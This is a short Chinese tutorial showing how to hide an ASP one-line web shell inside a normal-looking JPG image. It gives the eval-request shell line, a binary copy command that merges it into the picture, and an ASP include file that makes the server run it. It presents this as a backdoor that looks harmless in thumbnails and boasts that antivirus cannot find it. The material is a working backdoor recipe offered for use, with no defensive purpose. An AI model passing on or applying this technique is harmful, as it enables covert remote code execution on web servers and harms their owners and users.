主要亮点:图片木马(可以正常打开显示的木马)
先看代码:
仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。
1、找一张图片,名字改成1.jpg
2、<%eval request(“a”)%>存为1.asp(就是一句话木马)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件
注:以上三个文件放在同一目录里面
复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片,运行1.bat,就会出现一个图片asp.jpg,现在这个asp.jpg就是已经做好的木马了。
这个图片外表很正常,用缩略图也看不出任何破绽,但是却非常的危险,让人防不胜防。
利用方法:新建一个asp.asp 内容为:
<!–#include file=”asp.jpg”–>
把asp.jpg 和 asp.asp 放在同一目录,然后访问: asp.asp 用这种方法,任何杀毒是搜不到的